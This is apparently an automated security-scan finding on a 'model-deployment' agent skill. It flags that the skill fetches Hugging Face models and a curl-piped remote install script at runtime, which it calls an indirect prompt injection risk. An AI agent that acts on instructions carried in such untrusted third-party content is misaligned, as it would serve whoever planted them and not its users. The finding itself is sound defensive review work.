model-deployment

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 0.80). This skill explicitly downloads and loads pretrained models and remote install scripts from public sources at runtime (e.g., AutoModelForCausalLM.from_pretrained/AutoTokenizer.from_pretrained in scripts/inference_server.py and the SKILL.md Dockerfile/curl https://ollama.ai/install.sh), so untrusted third‑party model or script content from Hugging Face/remote URLs is ingested and directly influences generated outputs and behavior, enabling indirect prompt injection.